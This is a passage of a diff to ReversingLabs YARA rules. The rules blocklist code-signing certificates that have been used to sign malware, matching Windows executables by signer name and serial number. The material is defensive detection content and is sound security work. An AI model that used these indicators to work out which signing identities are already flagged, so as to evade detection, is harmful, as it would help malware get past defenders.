for digitally signing malware." author = "ReversingLabs" - id = "3ff8149b-4a90-5593-b12a-d815b04fce7e" + id = "9ac976c0-260f-5207-ae39-bbb722c38a92" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9822-L9840" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "348df24620bfe6322c410cb593f5caad67492b0b5af234ee89b0411beb4b48f9" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3828-L3844" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5ae8d2fb03cd0f945c2f5eb86de4e5da4fbb1cdf233d8a808157304538ced872" score = 75 quality = 90 tags = "INFO, FILE" @@ -13937,22 +33728,22 @@ rule REVERSINGLABS_Cert_Blocklist_Be89936C26Cd0D845074F6B7B47F480C : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Argus Security Maintenance Systems Inc." and (pe.signatures[i].serial=="00:be:89:93:6c:26:cd:0d:84:50:74:f6:b7:b4:7f:48:0c" or pe.signatures[i].serial=="be:89:93:6c:26:cd:0d:84:50:74:f6:b7:b4:7f:48:0c") and 1634235015<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Haw Farm LIMITED" and pe.signatures[i].serial=="08:65:3e:f2:ed:9e:6e:bb:56:ff:a7:e9:3f:96:32:35" and 1581465601<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0F20A5155E53Ce20Bb644F646Ed6A2Fd : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_9C4816D900A6Ecdbe54Adf72B19Ebcf5 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d52066d5-9bc1-5f72-8e97-7efda88c14b2" + id = "bd22372d-774b-5e25-b4e5-47d34fe1c40b" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9842-L9858" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "70d57f2c24d4ae6f17339bfb998589a3b10f5dd4b19ac8a5bc99e082145c4ed0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3846-L3864" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "92e8130f444417d5bc3788721280338bbed33e3362104de0cf27bc7c1fc30d0e" score = 75 quality = 90 tags = "INFO, FILE" @@ -13962,22 +33753,22 @@ rule REVERSINGLABS_Cert_Blocklist_0F20A5155E53Ce20Bb644F646Ed6A2Fd : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CB CAM SP Z O O" and pe.signatures[i].serial=="0f:20:a5:15:5e:53:ce:20:bb:64:4f:64:6e:d6:a2:fd" and 1635196200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Datamingo Limited" and (pe.signatures[i].serial=="00:9c:48:16:d9:00:a6:ec:db:e5:4a:df:72:b1:9e:bc:f5" or pe.signatures[i].serial=="9c:48:16:d9:00:a6:ec:db:e5:4a:df:72:b1:9e:bc:f5") and 1557187200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Ea734E1Dfb6E69Ed2Bc55E513Bf95B5E : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_269174F9Fe7C6Ed4E1D19B26C3F5B35F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8e059a2a-c436-5247-b395-a2f594c1c9a9" + id = "fbcf1f18-f612-5516-9a67-2564de76c456" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9860-L9878" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a18d1c1e5e22c1aa041a4b2d23d2aefcbedbd3517a079d578e1a143ecadb4533" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3866-L3882" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "95c9720d6311c2fe7026b6cac092d59967479e6c9382eac1d26f7745efa92860" score = 75 quality = 90 tags = "INFO, FILE" @@ -13987,22 +33778,22 @@ rule REVERSINGLABS_Cert_Blocklist_Ea734E1Dfb6E69Ed2Bc55E513Bf95B5E : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Postmarket LLC" and (pe.signatures[i].serial=="00:ea:73:4e:1d:fb:6e:69:ed:2b:c5:5e:51:3b:f9:5b:5e" or pe.signatures[i].serial=="ea:73:4e:1d:fb:6e:69:ed:2b:c5:5e:51:3b:f9:5b:5e") and 1635153791<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "GO ONLINE d.o.o." and pe.signatures[i].serial=="26:91:74:f9:fe:7c:6e:d4:e1:d1:9b:26:c3:f5:b3:5f" and 1586386919<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Ba67B0De51Ebb9B1179804E75357Ab26 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_523Fb4036368Dc26192D68827F2D889B : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "63938a97-2cb3-52b0-9717-c8949e3fae46" + id = "bfce2ea9-cbe0-5b58-b7f8-39d2dad28db6" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9880-L9898" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "69b9012fc4ab9636d159de49ff452f054030c1157cf70a95512b2a0748dad7c0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3884-L3900" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f1886a046305637d335c493972560de56d8186bf99183aed5e2040b2e530fc22" score = 75 quality = 90 tags = "INFO, FILE" @@ -14012,22 +33803,22 @@ rule REVERSINGLABS_Cert_Blocklist_Ba67B0De51Ebb9B1179804E75357Ab26 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Fjordland Bike Wear ApS" and (pe.signatures[i].serial=="00:ba:67:b0:de:51:eb:b9:b1:17:98:04:e7:53:57:ab:26" or pe.signatures[i].serial=="ba:67:b0:de:51:eb:b9:b1:17:98:04:e7:53:57:ab:26") and 1636145940<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO MEDUZA SERVICE GROUP" and pe.signatures[i].serial=="52:3f:b4:03:63:68:dc:26:19:2d:68:82:7f:2d:88:9b" and 1586847880<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Cff2B275Ba8A1Dde83Ac7Ff858399A62 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_84F842F6D33Cd2F25B88Dd1710E21137 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "50cc539a-1f00-566d-a83f-b4d8459506d8" + id = "202593d3-d63a-5852-b680-516504d92031" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9900-L9918" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d37e1d94048339a86b8fa173d3ab753fc5e79329b73df9fda5815cd622c57745" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3902-L3920" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5aad8e95d1306626b63d767fce4706104330dd776b75c09cc404227863564307" score = 75 quality = 90 tags = "INFO, FILE" @@ -14037,22 +33828,22 @@ rule REVERSINGLABS_Cert_Blocklist_Cff2B275Ba8A1Dde83Ac7Ff858399A62 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "XL-FORCE ApS" and (pe.signatures[i].serial=="00:cf:f2:b2:75:ba:8a:1d:de:83:ac:7f:f8:58:39:9a:62" or pe.signatures[i].serial=="cf:f2:b2:75:ba:8a:1d:de:83:ac:7f:f8:58:39:9a:62") and 1636111842<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DataNext s.r.o." and (pe.signatures[i].serial=="00:84:f8:42:f6:d3:3c:d2:f2:5b:88:dd:17:10:e2:11:37" or pe.signatures[i].serial=="84:f8:42:f6:d3:3c:d2:f2:5b:88:dd:17:10:e2:11:37") and 1586775720<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_D22E026C5B5966F1Cf6Ef00A7C06682E : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4Fbcaa289Ba925B4E247809B6B028202 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a72a0001-a272-506d-b610-c028ed8ac6da" + id = "d0c4c6c0-d8e3-5efc-a87b-01d1f98a2c18" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9920-L9938" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "33a05d46b40ffdf49bfa5facca41ebdf6bedcabc1cb1f5b9bf2d043ad1c869b0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3922-L3938" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c41a4f9ccda54b9735313edf9042b831e6eaca149c089f74a823cee6719e1064" score = 75 quality = 90 tags = "INFO, FILE" @@ -14062,22 +33853,22 @@ rule REVERSINGLABS_Cert_Blocklist_D22E026C5B5966F1Cf6Ef00A7C06682E : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AMCERT, LLC" and (pe.signatures[i].serial=="00:d2:2e:02:6c:5b:59:66:f1:cf:6e:f0:0a:7c:06:68:2e" or pe.signatures[i].serial=="d2:2e:02:6c:5b:59:66:f1:cf:6e:f0:0a:7c:06:68:2e") and 1636456620<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Kimjac ApS" and pe.signatures[i].serial=="4f:bc:aa:28:9b:a9:25:b4:e2:47:80:9b:6b:02:82:02" and 1588227220<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_3054F940C931Bad7B238A24376C6A5Cc : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_1F2E8Effbb08C7Dbcc7A7F2D835457B5 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "e5643d08-5957-58b0-8b46-d5e339dfba9c" + id = "cf032593-e742-56d5-a579-3f38a31e2c0c" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9940-L9956" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "21c8e8f10d1e4b9eb917c86ac868de2afcd5776a9c1d59149df1d07d8c3e14b9" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3940-L3956" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0b446641617d435c3d312592957e19c3d391b0149eafcf9ac2da51e8d9080eb4" score = 75 quality = 90 tags = "INFO, FILE" @@ -14087,22 +33878,22 @@ rule REVERSINGLABS_Cert_Blocklist_3054F940C931Bad7B238A24376C6A5Cc : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "POLE CLEAN LTD" and pe.signatures[i].serial=="30:54:f9:40:c9:31:ba:d7:b2:38:a2:43:76:c6:a5:cc" and 1637030220<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "RTI, OOO" and pe.signatures[i].serial=="1f:2e:8e:ff:bb:08:c7:db:cc:7a:7f:2d:83:54:57:b5" and 1581382360<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_A617E23D6Ca8F34E2F7413Cd299Fc72B : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Aeba4C39306Fdd022849867801645814 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "3ffb592c-eec5-51b1-9840-b6b72269fc31" + id = "f8cb78cf-541c-5038-b7af-83679c978ec8" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9958-L9976" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f307a0b598f0876c003aa43db50e024698b6f93931e626c085f98553c14ec2ae" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3958-L3976" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "82c149f1d8ef93a0df2035690c5cdca935236687bc36a35a84c3d6610eb6902c" score = 75 quality = 90 tags = "INFO, FILE" @@ -14112,22 +33903,22 @@ rule REVERSINGLABS_Cert_Blocklist_A617E23D6Ca8F34E2F7413Cd299Fc72B : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "EXPRESS BOOKS LTD" and (pe.signatures[i].serial=="00:a6:17:e2:3d:6c:a8:f3:4e:2f:74:13:cd:29:9f:c7:2b" or pe.signatures[i].serial=="a6:17:e2:3d:6c:a8:f3:4e:2f:74:13:cd:29:9f:c7:2b") and 1636971821<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SK AI MAS GmbH" and (pe.signatures[i].serial=="00:ae:ba:4c:39:30:6f:dd:02:28:49:86:78:01:64:58:14" or pe.signatures[i].serial=="ae:ba:4c:39:30:6f:dd:02:28:49:86:78:01:64:58:14") and 1579478400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_387Eeb89B8Bf626Bbf4C7C9F5B998B40 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_028D50Ae0C554B49148E82Db5B1C2699 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2f4a26f2-689a-57bd-8028-d3554e339e60" + id = "76ccda8a-bdea-5db2-a3a4-11292bfb3c95" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9978-L9994" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2377eeb5316d25752443735e78d0ad7de398a2677f5a0fd45fd6e6c87720d49b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3978-L3994" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e3cc0066cad56d78a3f42e092befa3b0855b2ed33c8465c5ecbb19fec082d35e" score = 75 quality = 90 tags = "INFO, FILE" @@ -14137,22 +33928,22 @@ rule REVERSINGLABS_Cert_Blocklist_387Eeb89B8Bf626Bbf4C7C9F5B998B40 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ULTRA ACADEMY LTD" and pe.signatures[i].serial=="38:7e:eb:89:b8:bf:62:6b:bf:4c:7c:9f:5b:99:8b:40" and 1637141034<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VAS CO PTY LTD" and pe.signatures[i].serial=="02:8d:50:ae:0c:55:4b:49:14:8e:82:db:5b:1c:26:99" and 1579478400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_292Eb1133507F42E6F36C5549C189D5E : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_684F478C7259Dde0Cfe2260112Ca9846 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b557864d-c573-5789-9959-8df3036d5ac5" + id = "840af428-47e0-529e-9db9-8ab9c968f2e3" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9996-L10012" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "bc3ef217455b74900cae114d25b02325d2bef25c11873342df1dd2369cbce76a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3996-L4012" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "59654ba1df27029a04ef3b1a1bb54f6c15b727f2013923a11a729752b8829743" score = 75 quality = 90 tags = "INFO, FILE" @@ -14162,22 +33953,22 @@ rule REVERSINGLABS_Cert_Blocklist_292Eb1133507F42E6F36C5549C189D5E : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Affairs-case s.r.o." and pe.signatures[i].serial=="29:2e:b1:13:35:07:f4:2e:6f:36:c5:54:9c:18:9d:5e" and 1638832273<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LLC \"IP EM\"" and pe.signatures[i].serial=="68:4f:47:8c:72:59:dd:e0:cf:e2:26:01:12:ca:98:46" and 1584981648<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_5Fbf16A33D26390A15F046C310030Cf0 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0B7C32208A954A483Dd102E1Be094867 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "620c04df-e613-5319-aa00-646c7e0c8031" + id = "d16e74d8-2c46-508b-b518-a542603ca726" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10014-L10030" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "24bee3563e0867ef6702e7f57bbce7075f766410650ae5ce1e2e8c7b14a3eaca" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4014-L4030" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "49e2208a7d2b5684283c1dfc9856f864d16b50f951f58e0252c97419819a46ec" score = 75 quality = 90 tags = "INFO, FILE" @@ -14187,22 +33978,22 @@ rule REVERSINGLABS_Cert_Blocklist_5Fbf16A33D26390A15F046C310030Cf0 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MACHINES SATU MARE SRL" and pe.signatures[i].serial=="5f:bf:16:a3:3d:26:39:0a:15:f0:46:c3:10:03:0c:f0" and 1638390070<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Win Sp Z O O" and pe.signatures[i].serial=="0b:7c:32:20:8a:95:4a:48:3d:d1:02:e1:be:09:48:67" and 1583884800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0F007898Afcba5F8Af8Ae65D01803617 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_3E72Daf2B9A4449E946009E5084A8E76 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "6678bd73-bf4d-5576-8bf2-b721ee288da7" + id = "aa7c6cbe-0794-59e3-a675-93beeccc9784" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10032-L10048" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "27610bb3bf069991803611474abf44a3bf82fc9283d0412a1c24ae46a3f5352e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4032-L4048" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f1a7bf6c18e0ebf8aef53feb7d7789ce87c96e00962c64e07a37d968702d2fa5" score = 75 quality = 90 tags = "INFO, FILE" @@ -14212,22 +34003,22 @@ rule REVERSINGLABS_Cert_Blocklist_0F007898Afcba5F8Af8Ae65D01803617 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TechnoElek s.r.o." and pe.signatures[i].serial=="0f:00:78:98:af:cb:a5:f8:af:8a:e6:5d:01:80:36:17" and 1638372946<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Infoteh63" and pe.signatures[i].serial=="3e:72:da:f2:b9:a4:44:9e:94:60:09:e5:08:4a:8e:76" and 1591787570<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_E55Be88Ddbd93C423220468D430905Dd : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_11Edd343E21C36Ac985555D85C16135F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "37e60515-0395-51a5-8bfa-35e3e336d60c" + id = "219f709f-4e05-5d0e-97a4-eca1e65153a3" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10050-L10068" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "05b2f297454e7080591b85991b224193eb89fc5074eb3c2e484ceadad2de4cb7" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4050-L4066" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "17feeed4be074a30572eb12fc81dc15d1b06f2d3f7b4b4fb4443391c62ac4d9b" score = 75 quality = 90 tags = "INFO, FILE" @@ -14237,22 +34028,22 @@ rule REVERSINGLABS_Cert_Blocklist_E55Be88Ddbd93C423220468D430905Dd : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VALVE ACTUATION LTD" and (pe.signatures[i].serial=="00:e5:5b:e8:8d:db:d9:3c:42:32:20:46:8d:43:09:05:dd" or pe.signatures[i].serial=="e5:5b:e8:8d:db:d9:3c:42:32:20:46:8d:43:09:05:dd") and 1637712000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Pribyl Handels GmbH" and pe.signatures[i].serial=="11:ed:d3:43:e2:1c:36:ac:98:55:55:d8:5c:16:13:5f" and 1589925600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_06Bcb74291D96096577Bdb1E165Dce85 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_093Fe63D1A5F68F14Ecaac871A03F7A3 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "da483b60-d400-54ef-84e0-ea00b299b466" + id = "ce0b23fd-5f79-5b90-8d5c-2ff59ac39df6" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10070-L10086" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "00b7ff8f3cbc04c48c71433c384d7a7884b856f261850e33ea4413a12cf5a1b5" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4068-L4084" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "333c58a9af2d94604b637ab0a7280b6688a89ff73e30a93a8daed040fab7f620" score = 75 quality = 90 tags = "INFO, FILE" @@ -14262,22 +34053,22 @@ rule REVERSINGLABS_Cert_Blocklist_06Bcb74291D96096577Bdb1E165Dce85 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Revo Security SRL" and pe.signatures[i].serial=="06:bc:b7:42:91:d9:60:96:57:7b:db:1e:16:5d:ce:85" and 1637971201<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains 